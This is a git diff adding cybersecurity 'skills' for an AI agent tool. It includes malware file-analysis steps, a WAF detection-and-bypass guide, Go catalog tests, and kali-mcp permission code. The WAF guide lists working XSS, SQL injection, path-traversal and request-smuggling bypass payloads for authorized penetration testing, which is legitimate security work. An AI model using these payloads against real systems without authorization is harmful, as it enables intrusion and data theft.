+### Detection
+```bash
+file sample.bin
+# Output: "ELF 64-bit LSB executable, x86-64"
+```
+
+### Static Analysis
+
+**ELF Header:**
+```bash
+readelf -h sample.bin
+```
+
+**Imported Libraries:**
+```bash
+ldd sample.bin
+```
+
+**Imported Symbols:**
+```bash
+nm -D sample.bin
+objdump -T sample.bin
+
+# Search for suspicious functions:
+nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
+```
+
+**Strings:**
+```bash
+strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
+```
+
+### Dynamic Analysis (Linux)
+
+**strace - System Call Monitoring:**
+```bash
+# Monitor all system calls
+strace -f ./sample.bin 2>&1 | tee strace_output.txt
+
+# Network operations only
+strace -e trace=socket,connect,send,recv ./sample.bin
+```
+
+### Analysis Checklist - ELF
+
+- [ ] Architecture identified (x86/x64/ARM)
+- [ ] Imported libraries documented
+- [ ] Suspicious functions identified
+- [ ] Packing detected and removed (if UPX)
+- [ ] Strings extracted and analyzed
+- [ ] System calls monitored (strace)
+- [ ] Network activity captured
+- [ ] File operations documented
+
+---
+
+## Integration with Report Writing
+
+Each file type contributes specific sections to the malware analysis report:
+
+**.NET Analysis** → Decompiled code snippets, embedded resource descriptions
+**Office Macros** → Macro code (sanitized), auto-execution methods, download URLs
+**PDF Analysis** → Embedded JavaScript, auto-action triggers, exploit CVEs
+**Scripts** → Deobfuscated code, execution flow, download cradles
+**Archives/LNK** → Archive structure, masquerading techniques, LNK target analysis
+**ELF Binaries** → System calls used, network protocols, persistence mechanisms
+
+---
+
+## Tool Quick Reference
+
+| File Type | Primary Tool | Secondary Tool |
+|-----------|--------------|----------------|
+| **.NET** | dnSpy | ILSpy, de4dot |
+| **Office Macros** | oledump.py | olevba, XLMMacroDeobfuscator |
+| **PDF** | pdfid.py, pdf-parser.py | peepdf |
+| **PowerShell** | PSDecode | Manual analysis |
+| **VBScript/JS** | Text editor + analysis | js-beautify |
+| **Archives** | 7z, unzip, tar | - |
+| **LNK** | LECmd (Win), lnkinfo (Linux) | strings |
+| **ELF** | readelf, nm, objdump | strace, ltrace |
+
+---
+
+## Best Practices
+
+**Do:**
+- Always identify file type first (`file` command)
+- Extract in isolated environments
+- Document obfuscation techniques
+- Save original and deobfuscated versions
+- Test extracted IOCs for accuracy
+- Cross-reference with VirusTotal/MalwareBazaar
+
+**Don't:**
+- Execute scripts without understanding them first
+- Trust file extensions (check magic bytes)
+- Skip deobfuscation steps
+- Extract archives directly to important directories
+- Assume password-protected = safe
+
+---
+
+## Example Usage
+
+**User request:** "I have a suspicious .docm file with macros, help me analyze it"
+
+**Workflow:**
+1. Confirm file type (Office document)
+2. Use oledump.py to list streams
+3. Extract VBA macro code
+4. Identify auto-execution functions
+5. Decode obfuscated strings
+6. Extract download URLs and IOCs
+7. Document payload delivery method
+8. Prepare findings for report
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **File type test**: Verify all 8 file type sections (.NET, Office, PDF, Scripts, Archives, LNK, ELF, Batch) have analysis checklists.
+3. **Tool test**: Check that all referenced tools (dnSpy, oledump.py, pdfid.py, pdf-parser.py, olevba, readelf, strace) have correct command examples.
+4. **Checklist test**: Validate each file type's analysis checklist has appropriate items for that format.
+5. **Integration test**: Confirm referenced skills (malware-triage, malware-report-writer) exist.

--- a/internal/assets/skills/waf-detection-bypass/SKILL.md
+++ b/internal/assets/skills/waf-detection-bypass/SKILL.md
@@ -1,0 +1,372 @@
+---
+name: waf-detection-bypass
+description: "Detect and bypass WAFs during authorized testing. Trigger: identifying WAF vendors, selecting bypass payloads, or assessing attack surface behind WAFs."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# WAF Detection & Bypass
+
+Identify Web Application Firewalls, understand their rulesets, and test bypass techniques during authorized penetration tests to assess the real security posture behind the WAF layer.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- **Identify** which WAF protects a target application
+- **Bypass** WAF rules to test the actual application security
+- **Assess** whether WAF-only defenses are sufficient
+- **Demonstrate** that WAF evasion is possible in pentest reports
+- **Test** WAF rules during blue team/purple team exercises
+- **Understand** why certain payloads are blocked and adapt
+
+> **Authorization Required:** Only use these techniques during authorized penetration tests, bug bounty programs with explicit WAF testing scope, or on systems you own. Unauthorized WAF bypass attempts are illegal.
+
+## WAF Detection
+
+### Fingerprinting Techniques
+
+#### 1. Response Header Analysis
+
+```bash
+# Check common WAF headers
+curl -sI https://target.com | grep -iE "server|x-powered|x-cdn|x-cache|cf-ray|x-sucuri|x-akamai"
+
+# Common WAF headers:
+# Server: cloudflare          → Cloudflare
+# X-Sucuri-ID: ...            → Sucuri
+# X-CDN: Incapsula            → Imperva/Incapsula
+# X-Akamai-Transformed: ...   → Akamai
+# Server: AkamaiGHost         → Akamai
+# X-SL-CompState: ...         → Silverline (F5)
+# Server: BigIP               → F5 BIG-IP
+```
+
+#### 2. Error Page Fingerprinting
+
+Send an obvious attack payload and analyze the block page:
+
+```bash
+# Trigger WAF block
+curl -s "https://target.com/?id=<script>alert(1)</script>"
+curl -s "https://target.com/?id=1' OR 1=1--"
+curl -s "https://target.com/?id=../../../etc/passwd"
+```
+
+#### 3. Cookie Analysis
+
+```bash
+# WAF-specific cookies
+# __cfduid, cf_clearance         → Cloudflare
+# incap_ses_*, visid_incap_*     → Imperva
+# _citrix_ns_id_*                → Citrix NetScaler
+# ts*, BIGipServer*              → F5 BIG-IP
+# ak_bmsc, bm_sv                → Akamai Bot Manager
+```
+
+### WAF Signature Database
+
+| WAF | Detection Headers | Block Page Markers | Cookies |
+|-----|-------------------|-------------------|---------|
+| **Cloudflare** | `cf-ray`, `Server: cloudflare` | "Attention Required", "cloudflare" | `__cfduid`, `cf_clearance` |
+| **AWS WAF** | `x-amzn-RequestId` | "403 Forbidden" (generic) | None specific |
+| **Akamai** | `X-Akamai-Transformed`, `Server: AkamaiGHost` | "Access Denied", reference ID | `ak_bmsc` |
+| **Imperva/Incapsula** | `X-CDN: Incapsula` | "Request unsuccessful. Incapsula" | `incap_ses_*`, `visid_incap_*` |
+| **F5 BIG-IP ASM** | `Server: BigIP` | "The requested URL was rejected" | `TS*`, `BIGipServer*` |
+| **ModSecurity** | None (transparent) | "Forbidden" + ModSecurity ID | None specific |
+| **Sucuri** | `X-Sucuri-ID`, `X-Sucuri-Cache` | "Access Denied - Sucuri" | `sucuri_cloudproxy_*` |
+| **Barracuda** | `Server: Barracuda` | "Barracuda Web Application Firewall" | `barra_*` |
+| **Fortinet FortiWeb** | `Server: FortiWeb` | "Server Busy" or custom | None specific |
+| **Citrix NetScaler** | `Via: NS-CACHE` | "ns_af" in response | `citrix_ns_id` |
+| **Azure WAF** | None specific | "Azure WAF" reference | None specific |
+| **Google Cloud Armor** | None specific | "Our systems have detected unusual traffic" | None specific |
+| **Fastly** | `Via: 1.1 varnish`, `X-Served-By` | Custom per customer | None specific |
+| **Radware AppWall** | None specific | "Unauthorized Activity" | None specific |
+| **DDoS-Guard** | `Server: ddos-guard` | DDoS-Guard branded page | `__ddg*` |
+| **Wordfence** | None specific | "Wordfence" branded block | `wfwaf-*` |
+
+### Automated Detection
+
+```bash
+# wafw00f - WAF detection tool
+pip install wafw00f
+wafw00f https://target.com
+
+# Nmap WAF detection
+nmap -p 80,443 --script http-waf-detect target.com
+nmap -p 80,443 --script http-waf-fingerprint target.com
+```
+
+## Bypass Techniques
+
+### Category 1: Encoding Bypasses
+
+```yaml
+url_encoding:
+  description: "Encode characters WAF looks for"
+  examples:
+    - original: "<script>alert(1)</script>"
+      bypass: "%3Cscript%3Ealert(1)%3C/script%3E"
+    - original: "' OR 1=1--"
+      bypass: "%27%20OR%201%3D1--"
+
+double_url_encoding:
+  description: "Encode the percent signs themselves"
+  examples:
+    - original: "<script>"
+      bypass: "%253Cscript%253E"
+  note: "Works when app decodes twice but WAF only decodes once"
+
+unicode_encoding:
+  description: "Use Unicode representations"
+  examples:
+    - original: "<script>"
+      bypass: "＜script＞"  # Fullwidth characters
+    - original: "' OR"
+      bypass: "＇ OR"
+  note: "Effective against WAFs that don't normalize Unicode"
+
+html_entity_encoding:
+  description: "Use HTML entities in XSS contexts"
+  examples:
+    - original: "<img src=x onerror=alert(1)>"
+      bypass: "<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>"
+    - original: "javascript:alert(1)"
+      bypass: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)"
+```
+
+### Category 2: Case and Syntax Variation
+
+```yaml
+case_switching:
+  xss:
+    - "<ScRiPt>alert(1)</ScRiPt>"
+    - "<IMG SRC=x OnErRoR=alert(1)>"
+  sqli:
+    - "' oR 1=1--"
+    - "' UnIoN SeLeCt 1,2,3--"
+
+comment_injection:
+  sqli:
+    - "UN/**/ION SEL/**/ECT 1,2,3--"
+    - "1' /*!50000OR*/ 1=1--"
+    - "' OR/**/ 1=1--"
+  note: "MySQL inline comments with version numbers"
+
+whitespace_alternatives:
+  sqli:
+    - "' OR%091=1--"         # Tab instead of space
+    - "' OR%0a1=1--"         # Newline
+    - "' OR%0d1=1--"         # Carriage return
+    - "' OR%0c1=1--"         # Form feed
+    - "' OR%a01=1--"         # Non-breaking space (MySQL)
+```
+
+### Category 3: Payload Alternatives
+
+```yaml
+xss_tag_alternatives:
+  description: "Use HTML tags that WAFs might not block"
+  payloads:
+    - "<svg onload=alert(1)>"
+    - "<body onload=alert(1)>"
+    - "<details open ontoggle=alert(1)>"
+    - "<marquee onstart=alert(1)>"
+    - "<video src=x onerror=alert(1)>"
+    - "<audio src=x onerror=alert(1)>"
+    - "<input onfocus=alert(1) autofocus>"
+    - "<select onfocus=alert(1) autofocus>"
+    - "<textarea onfocus=alert(1) autofocus>"
+    - "<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror=alert(1)>"
+
+xss_event_handlers:
+  description: "Less common event handlers"
+  payloads:
+    - "onanimationend"
+    - "onanimationiteration"
+    - "onwebkitanimationend"
+    - "ontransitionend"
+    - "onpointerover"
+    - "onfocusin"
+
+sqli_function_alternatives:
+  description: "Alternative SQL functions"
+  payloads:
+    concat_alternatives:
+      - "CONCAT(0x41, 0x42)"           # Standard
+      - "0x41 || 0x42"                 # PostgreSQL
+      - "GROUP_CONCAT(column)"          # MySQL
+      - "STRING_AGG(column, ',')"       # PostgreSQL/MSSQL
+    sleep_alternatives:
+      - "SLEEP(5)"                      # MySQL
+      - "pg_sleep(5)"                   # PostgreSQL
+      - "WAITFOR DELAY '00:00:05'"      # MSSQL
+      - "DBMS_LOCK.SLEEP(5)"            # Oracle
+    version_detection:
+      - "@@version"                     # MySQL/MSSQL
+      - "version()"                     # PostgreSQL
+      - "SELECT banner FROM v$version"  # Oracle
+```
+
+### Category 4: HTTP Smuggling and Chunking
+
+```yaml
+chunked_transfer:
+  description: "Split payload across chunks to bypass inspection"
+  technique: |
+    POST /vulnerable HTTP/1.1
+    Transfer-Encoding: chunked
+
+    5
+    <scri
+    3
+    pt>
+    9
+    alert(1)
+    a
+    </script>
+    0
+
+http_parameter_pollution:
+  description: "Same parameter multiple times, different servers handle differently"
+  examples:
+    - url: "/search?q=harmless&q=<script>alert(1)</script>"
+      note: "Apache uses last, IIS uses all, Tomcat uses first"
+    - url: "/search?q=1&q=UNION&q=SELECT&q=1,2,3--"
+      note: "WAF may only inspect first parameter value"
+
+content_type_confusion:
+  description: "Send body in unexpected Content-Type"
+  examples:
+    - technique: "Send JSON body with application/x-www-form-urlencoded header"
+    - technique: "Send URL-encoded body with multipart/form-data header"
+    - technique: "Use charset variations: Content-Type: application/json; charset=ibm037"
+```
+
+### Category 5: Path and Request Manipulation
+
+```yaml
+path_manipulation:
+  description: "Alter URL path to bypass path-based WAF rules"
+  techniques:
+    - "/./admin" instead of "/admin"
+    - "//admin" double slash
+    - "/admin%20" trailing encoded space
+    - "/admin..;/" path traversal normalization
+    - "/Admin" case variation (if backend is case-insensitive)
+    - "/api/v2/../v1/admin" path traversal to reach blocked endpoint
+
+http_method_override:
+  description: "Override HTTP method via headers"
+  techniques:
+    - "X-HTTP-Method-Override: PUT"
+    - "X-HTTP-Method: DELETE"
+    - "X-Method-Override: PATCH"
+  note: "Send as POST but override to method WAF doesn't inspect"
+
+ip_rotation:
+  description: "Distribute requests across source IPs"
+  techniques:
+    - "X-Forwarded-For: 1.2.3.4"
+    - "X-Real-IP: 1.2.3.4"
+    - "X-Originating-IP: 1.2.3.4"
+    - "True-Client-IP: 1.2.3.4"
+  note: "Only works if WAF trusts these headers (misconfiguration)"
+```
+
+## WAF-Aware Testing Strategy
+
+### Phase 1: Identify WAF
+
+```
+1. Send normal requests → establish baseline response
+2. Send obvious attack payloads → trigger WAF block
+3. Analyze block page, headers, cookies
+4. Confirm WAF vendor and version if possible
+5. Document WAF behavior (block vs rate-limit vs captcha)
+```
+
+### Phase 2: Characterize Rules
+
+```
+1. Test basic payloads per category (XSS, SQLi, LFI, RCE)
+2. Identify which SPECIFIC strings/patterns are blocked
+3. Test encoding variations → find what passes through
+4. Test via different injection points (URL, body, headers, cookies)
+5. Document: blocked patterns vs. allowed patterns
+```
+
+### Phase 3: Select Bypasses
+
+```
+1. Based on WAF vendor → select known bypass techniques
+2. Start with encoding bypasses (least suspicious)
+3. Try payload alternatives (different tags, functions)
+4. Try request-level bypasses (chunking, HPP, method override)
+5. Document: which bypasses work, which don't
+```
+
+### Phase 4: Test Real Vulnerabilities
+
+```
+1. Use working bypasses to test actual application logic
+2. Remember: WAF bypass is a MEANS, not the finding
+3. The REAL finding is the underlying vulnerability
+4. Report both: "Application has SQLi, WAF provides partial mitigation"
+5. Recommend fixing the application code, not just relying on WAF
+```
+
+## Reporting WAF Findings
+
+```markdown
+### WAF Assessment
+
+**WAF Identified:** [Vendor/Product]
+**Detection Method:** [Headers/Block page/Cookies]
+**Bypass Achieved:** [Yes/No/Partial]
+
+### Bypass Details
+
+| Attack Type | Blocked Payload | Bypass Payload | Result |
+|-------------|-----------------|----------------|--------|
+| XSS | `<script>alert(1)</script>` | `<svg onload=alert(1)>` | Bypass successful |
+| SQLi | `' OR 1=1--` | `' /*!50000OR*/ 1=1--` | Bypass successful |
+| LFI | `../../etc/passwd` | `....//....//etc/passwd` | Blocked |
+
+### Recommendation
+
+WAF provides defense-in-depth but should NOT be the sole protection.
+The following application-level vulnerabilities exist behind the WAF:
+1. [Vulnerability details with bypass proof]
+
+**Fix the application code.** WAF rules can always be bypassed given enough time.
+```
+
+## Quality Checklist
+
+- [ ] WAF identified with multiple detection methods
+- [ ] Testing performed only with explicit authorization
+- [ ] Bypass attempts documented (successful AND failed)
+- [ ] Underlying vulnerabilities reported separately from WAF bypass
+- [ ] Report recommends application-level fixes, not just WAF tuning
+- [ ] Rate limiting respected during testing (don't DoS the WAF)
+- [ ] Bypasses verified with ai-pentesting-validation pipeline
+- [ ] Chain opportunities with bypassed payloads explored
+
+## Integration Points
+
+- **ai-pentesting-validation** - Validate findings discovered behind WAF
+- **exploit-chain-patterns** - WAF bypass is often step 1 in a chain
+- **detection-engineer** - Create WAF rules / Sigma rules for bypass attempts
+- **pentest-orchestrator** - WAF detection is an early phase in orchestrated testing
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Signature test**: Verify the WAF signature database table renders correctly with all vendor entries.
+3. **Bypass test**: Check that all 5 bypass category YAML blocks are syntactically valid.
+4. **Strategy test**: Validate the 4-phase WAF-aware testing strategy is complete and sequential.
+5. **Integration test**: Confirm referenced skills (ai-pentesting-validation, exploit-chain-patterns, detection-engineer, pentest-orchestrator) exist.

--- a/internal/catalog/cyber_skills_test.go
+++ b/internal/catalog/cyber_skills_test.go
@@ -1,0 +1,289 @@
+package catalog
+
+import (
+	"regexp"
+	"strings"
+	"testing"
+
+	"github.com/gentleman-programming/gentle-ai/internal/assets"
+	"github.com/gentleman-programming/gentle-ai/internal/model"
+)
+
+// TestMVPCyberSkillsReturns10Entries verifies that MVPCyberSkills() returns
+// exactly 10 cyber skills.
+//
+// Spec: cyber-testing — "All 10 cyber skills registered in catalog"
+func TestMVPCyberSkillsReturns10Entries(t *testing.T) {
+	skills := MVPCyberSkills()
+	if got := len(skills); got != 10 {
+		t.Fatalf("MVPCyberSkills() returned %d skills, want 10", got)
+	}
+}
+
+// TestCyberSkillCategoriesAreValid ensures every cyber skill has a valid
+// category (red-team, blue-team, soc, or compliance).
+//
+// Spec: cyber-testing — "All catalog entries have valid categories"
+func TestCyberSkillCategoriesAreValid(t *testing.T) {
+	validCategories := map[string]bool{
+		"red-team":   true,
+		"blue-team":  true,
+		"soc":        true,
+		"compliance": true,
+	}
+
+	for _, s := range MVPCyberSkills() {
+		if !validCategories[s.Category] {
+			t.Errorf("cyber skill %q has invalid category %q", s.Name, s.Category)
+		}
+	}
+}
+
+// TestCyberSkillCategoryCounts verifies the expected distribution of cyber
+// skills across categories: 4 red-team, 2 blue-team, 4 soc.
+func TestCyberSkillCategoryCounts(t *testing.T) {
+	counts := make(map[string]int)
+	for _, s := range MVPCyberSkills() {
+		counts[s.Category]++
+	}
+
+	wantCounts := map[string]int{
+		"red-team":  4,
+		"blue-team": 2,
+		"soc":       4,
+	}
+
+	for cat, want := range wantCounts {
+		if got := counts[cat]; got != want {
+			t.Errorf("category %q: got %d skills, want %d", cat, got, want)
+		}
+	}
+}
+
+// TestNoSkillIDCollisions ensures no cyber skill ID duplicates any MVP skill ID.
+//
+// Spec: cyber-testing — "No SkillID collisions"
+func TestNoSkillIDCollisions(t *testing.T) {
+	mvpSet := make(map[model.SkillID]bool)
+	for _, s := range MVPSkills() {
+		mvpSet[s.ID] = true
+	}
+
+	for _, s := range MVPCyberSkills() {
+		if mvpSet[s.ID] {
+			t.Errorf("cyber skill %q collides with an MVP skill ID", s.ID)
+		}
+	}
+}
+
+// TestCyberSkillIDsAreUnique ensures no duplicate skill IDs within the cyber catalog.
+func TestCyberSkillIDsAreUnique(t *testing.T) {
+	seen := make(map[model.SkillID]bool)
+	for _, s := range MVPCyberSkills() {
+		if seen[s.ID] {
+			t.Errorf("duplicate cyber skill ID %q", s.ID)
+		}
+		seen[s.ID] = true
+	}
+}
+
+// TestCyberSkillsHaveRequiredFrontmatter verifies every cyber skill SKILL.md
+// file has valid frontmatter with required fields.
+//
+// Spec: cyber-testing — "All cyber skill frontmatter is valid"
+func TestCyberSkillsHaveRequiredFrontmatter(t *testing.T) {
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	for _, name := range cyberSkillNames {
+		t.Run(name, func(t *testing.T) {
+			skillPath := "skills/" + name + "/SKILL.md"
+			content := assets.MustRead(skillPath)
+
+			// Must start with --- delimiter.
+			if !strings.HasPrefix(content, "---\n") {
+				t.Error("frontmatter must start with `---`")
+			}
+
+			// Must have closing --- delimiter.
+			rest := strings.TrimPrefix(content, "---\n")
+			closeIdx := strings.Index(rest, "\n---")
+			if closeIdx == -1 {
+				t.Fatal("missing closing `---` delimiter")
+			}
+			block := rest[:closeIdx]
+
+			// Check required fields.
+			if !strings.Contains(block, "name:") {
+				t.Error("missing required `name:` field")
+			}
+			if !strings.Contains(block, "description:") {
+				t.Error("missing required `description:` field")
+			}
+			if !strings.Contains(block, "license:") {
+				t.Error("missing required `license:` field")
+			}
+			if !strings.Contains(block, "metadata:") {
+				t.Error("missing required `metadata:` field")
+			}
+
+			// Check metadata.author.
+			if !strings.Contains(block, "author:") {
+				t.Error("missing `metadata.author` field")
+			}
+
+			// Check metadata.version.
+			if !strings.Contains(block, "version:") {
+				t.Error("missing `metadata.version` field")
+			}
+
+			// Description must contain "Trigger:".
+			descLine := extractFrontmatterValue(block, "description")
+			if descLine == "" {
+				t.Fatal("could not extract description value")
+			}
+			if !strings.Contains(descLine, "Trigger:") {
+				t.Errorf("description must contain `Trigger:` substring; got: %q", descLine)
+			}
+
+			// Description must be <= 160 chars.
+			if len([]rune(descLine)) > 160 {
+				t.Errorf("description length = %d chars, want <= 160", len([]rune(descLine)))
+			}
+
+			// Must have ## Validation section in body.
+			body := content[closeIdx+4:]
+			if !strings.Contains(body, "## Validation") {
+				t.Error("skill body must contain `## Validation` section")
+			}
+		})
+	}
+}
+
+// TestDestructiveToolsRequireConfirmation verifies that the kali-mcp manifest
+// has permission_tier: destructive and a non-empty destructive_tools array.
+//
+// Spec: cyber-testing — "Destructive manifests declare destructive tools"
+func TestDestructiveToolsRequireConfirmation(t *testing.T) {
+	content := assets.MustRead("mcps/kali-mcp/manifest.json")
+
+	// Check permission_tier.
+	if !strings.Contains(content, `"permission_tier": "destructive"`) {
+		t.Error("kali-mcp manifest must have permission_tier: destructive")
+	}
+
+	// Check destructive_tools array exists and is non-empty.
+	if !strings.Contains(content, `"destructive_tools"`) {
+		t.Fatal("kali-mcp manifest missing destructive_tools field")
+	}
+
+	// Count tool entries (simple check: each tool is a quoted string in the array).
+	toolPattern := regexp.MustCompile(`"[a-z_]+"`)
+	tools := toolPattern.FindAllString(content, -1)
+	if len(tools) == 0 {
+		t.Error("destructive_tools array must be non-empty")
+	}
+
+	// Verify confirmation_required is true.
+	if !strings.Contains(content, `"confirmation_required": true`) {
+		t.Error("kali-mcp manifest must have confirmation_required: true")
+	}
+}
+
+// TestUnrestrictedManifestsHaveNoDestructiveTools verifies that unrestricted
+// MCP manifests do not declare destructive tools.
+func TestUnrestrictedManifestsHaveNoDestructiveTools(t *testing.T) {
+	manifests := []string{
+		"mcps/shodan-mcp/manifest.json",
+		"mcps/virustotal-mcp/manifest.json",
+	}
+
+	for _, manifestPath := range manifests {
+		t.Run(manifestPath, func(t *testing.T) {
+			content := assets.MustRead(manifestPath)
+
+			if !strings.Contains(content, `"permission_tier": "unrestricted"`) {
+				t.Errorf("%s must have permission_tier: unrestricted", manifestPath)
+			}
+
+			if strings.Contains(content, `"destructive_tools"`) {
+				t.Errorf("%s must not have destructive_tools field (unrestricted tier)", manifestPath)
+			}
+		})
+	}
+}
+
+// TestProwlerCheckIDFormat scans cyber skill content for Prowler check ID
+// references and validates their format.
+//
+// Spec: cyber-testing — "Valid Prowler check ID references pass"
+func TestProwlerCheckIDFormat(t *testing.T) {
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	// Pattern for Prowler check references: check: <id> or similar.
+	prowlerRefPattern := regexp.MustCompile(`check:\s*([A-Za-z0-9_.-]+)`)
+	validIDPattern := regexp.MustCompile(`^[a-z0-9_]+$`)
+
+	for _, name := range cyberSkillNames {
+		t.Run(name, func(t *testing.T) {
+			skillPath := "skills/" + name + "/SKILL.md"
+			content := assets.MustRead(skillPath)
+
+			matches := prowlerRefPattern.FindAllStringSubmatch(content, -1)
+			for _, match := range matches {
+				checkID := match[1]
+				if !validIDPattern.MatchString(checkID) {
+					t.Errorf("malformed Prowler check ID %q in %s (must match ^[a-z0-9_]+$)", checkID, skillPath)
+				}
+			}
+
+			// Skills without Prowler references should pass cleanly.
+			if len(matches) == 0 {
+				t.Log("no Prowler check references found (skipped cleanly)")
+			}
+		})
+	}
+}
+
+// extractFrontmatterValue extracts the value for a given key from a YAML
+// frontmatter block. Handles quoted scalars.
+func extractFrontmatterValue(block, key string) string {
+	lines := strings.Split(block, "\n")
+	prefix := key + ":"
+	for _, line := range lines {
+		trimmed := strings.TrimSpace(line)
+		if strings.HasPrefix(trimmed, prefix) {
+			value := strings.TrimSpace(trimmed[len(prefix):])
+			// Strip quotes.
+			if len(value) >= 2 {
+				if (value[0] == '"' && value[len(value)-1] == '"') ||
+					(value[0] == '\'' && value[len(value)-1] == '\'') {
+					return value[1 : len(value)-1]
+				}
+			}
+			return value
+		}
+	}
+	return ""
+}

--- a/internal/catalog/skills.go
+++ b/internal/catalog/skills.go
@@ -42,3 +42,27 @@ func MVPSkills() []Skill {
 	copy(skills, mvpSkills)
 	return skills
 }
+
+// cyberSkills are the v1 cybersecurity skills for the cyber preset.
+var cyberSkills = []Skill{
+	// Red-team
+	{ID: model.SkillPentestOrchestrator, Name: "pentest-orchestrator", Category: "red-team", Priority: "p0"},
+	{ID: model.SkillAIPentestingValidation, Name: "ai-pentesting-validation", Category: "red-team", Priority: "p0"},
+	{ID: model.SkillExploitChainPatterns, Name: "exploit-chain-patterns", Category: "red-team", Priority: "p0"},
+	{ID: model.SkillWAFDetectionBypass, Name: "waf-detection-bypass", Category: "red-team", Priority: "p0"},
+	// Blue-team
+	{ID: model.SkillDetectionEngineer, Name: "detection-engineer", Category: "blue-team", Priority: "p0"},
+	{ID: model.SkillSecurityPythonScripts, Name: "python-security", Category: "blue-team", Priority: "p0"},
+	// SOC
+	{ID: model.SkillMalwareTriage, Name: "malware-triage", Category: "soc", Priority: "p0"},
+	{ID: model.SkillSpecializedFileAnalyzer, Name: "specialized-file-analyzer", Category: "soc", Priority: "p0"},
+	{ID: model.SkillMalwareDynamicAnalysis, Name: "malware-dynamic-analysis", Category: "soc", Priority: "p0"},
+	{ID: model.SkillMalwareReportWriter, Name: "malware-report-writer", Category: "soc", Priority: "p0"},
+}
+
+// MVPCyberSkills returns the cybersecurity skills for the cyber preset.
+func MVPCyberSkills() []Skill {
+	skills := make([]Skill, len(cyberSkills))
+	copy(skills, cyberSkills)
+	return skills
+}

--- a/internal/catalog/skills_test.go
+++ b/internal/catalog/skills_test.go
@@ -16,6 +16,9 @@ func TestMVPSkillsCoverAllPresetSkills(t *testing.T) {
 	for _, s := range MVPSkills() {
 		catalogSet[s.ID] = true
 	}
+	for _, s := range MVPCyberSkills() {
+		catalogSet[s.ID] = true
+	}
 
 	presetSkills := skills.AllSkillIDs()
 	for _, id := range presetSkills {
@@ -33,5 +36,31 @@ func TestMVPSkillsNoDuplicates(t *testing.T) {
 			t.Errorf("duplicate skill %q in mvpSkills", s.ID)
 		}
 		seen[s.ID] = true
+	}
+}
+
+// TestMVPCyberSkillsNoDuplicates ensures no cyber skill is listed twice.
+func TestMVPCyberSkillsNoDuplicates(t *testing.T) {
+	seen := make(map[model.SkillID]bool)
+	for _, s := range MVPCyberSkills() {
+		if seen[s.ID] {
+			t.Errorf("duplicate cyber skill %q in MVPCyberSkills", s.ID)
+		}
+		seen[s.ID] = true
+	}
+}
+
+// TestMVPCyberSkillsCategoriesAreValid ensures every cyber skill has a valid category.
+func TestMVPCyberSkillsCategoriesAreValid(t *testing.T) {
+	validCategories := map[string]bool{
+		"red-team":    true,
+		"blue-team":   true,
+		"soc":         true,
+		"compliance":  true,
+	}
+	for _, s := range MVPCyberSkills() {
+		if !validCategories[s.Category] {
+			t.Errorf("cyber skill %q has invalid category %q", s.Name, s.Category)
+		}
 	}
 }

--- a/internal/cli/validate.go
+++ b/internal/cli/validate.go
@@ -79,7 +79,7 @@ func normalizePreset(value string) (model.PresetID, error) {
 	}
 
 	switch model.PresetID(value) {
-	case model.PresetFullGentleman, model.PresetEcosystemOnly, model.PresetMinimal, model.PresetCustom:
+	case model.PresetFullGentleman, model.PresetEcosystemOnly, model.PresetMinimal, model.PresetCustom, model.PresetCyber:
 		return model.PresetID(value), nil
 	default:
 		return "", fmt.Errorf("unsupported preset %q", value)
@@ -115,6 +115,9 @@ func normalizeSkills(values []string) ([]model.SkillID, error) {
 
 	allowed := map[model.SkillID]struct{}{}
 	for _, skill := range catalog.MVPSkills() {
+		allowed[skill.ID] = struct{}{}
+	}
+	for _, skill := range catalog.MVPCyberSkills() {
 		allowed[skill.ID] = struct{}{}
 	}
 

--- a/internal/components/mcp/kali_mcp.go
+++ b/internal/components/mcp/kali_mcp.go
@@ -1,0 +1,420 @@
+package mcp
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+
+	"github.com/gentleman-programming/gentle-ai/internal/assets"
+	"github.com/gentleman-programming/gentle-ai/internal/components/filemerge"
+	"github.com/gentleman-programming/gentle-ai/internal/model"
+)
+
+// kaliMCPManifest holds the parsed kali-mcp manifest.json.
+type kaliMCPManifest struct {
+	Name                 string   `json:"name"`
+	Type                 string   `json:"type"`
+	Description          string   `json:"description"`
+	PermissionTier       string   `json:"permission_tier"`
+	DestructiveTools     []string `json:"destructive_tools"`
+	ConfirmationRequired bool     `json:"confirmation_required"`
+}
+
+// loadKaliManifest reads and parses the kali-mcp manifest.json from embedded assets.
+func loadKaliManifest() (kaliMCPManifest, error) {
+	content, err := assets.FS.ReadFile("mcps/kali-mcp/manifest.json")
+	if err != nil {
+		return kaliMCPManifest{}, fmt.Errorf("read kali-mcp manifest: %w", err)
+	}
+
+	var manifest kaliMCPManifest
+	if err := json.Unmarshal(content, &manifest); err != nil {
+		return kaliMCPManifest{}, fmt.Errorf("parse kali-mcp manifest: %w", err)
+	}
+
+	return manifest, nil
+}
+
+// kaliWarningComment returns the warning comment block for destructive tools.
+// The comment is prefixed to MCP JSON files for agents using StrategySeparateMCPFiles.
+func kaliWarningComment(tools []string) string {
+	comment := "/**_WARNING**/\n"
+	comment += " * DESTRUCTIVE TOOLS: The following kali-mcp tools can cause real damage\n"
+	comment += " * to production systems. NEVER auto-invoke these tools without explicit\n"
+	comment += " * human confirmation:\n"
+	for _, tool := range tools {
+		comment += fmt.Sprintf(" *   - %s\n", tool)
+	}
+	comment += " * Always confirm with the user before executing any of these tools.\n"
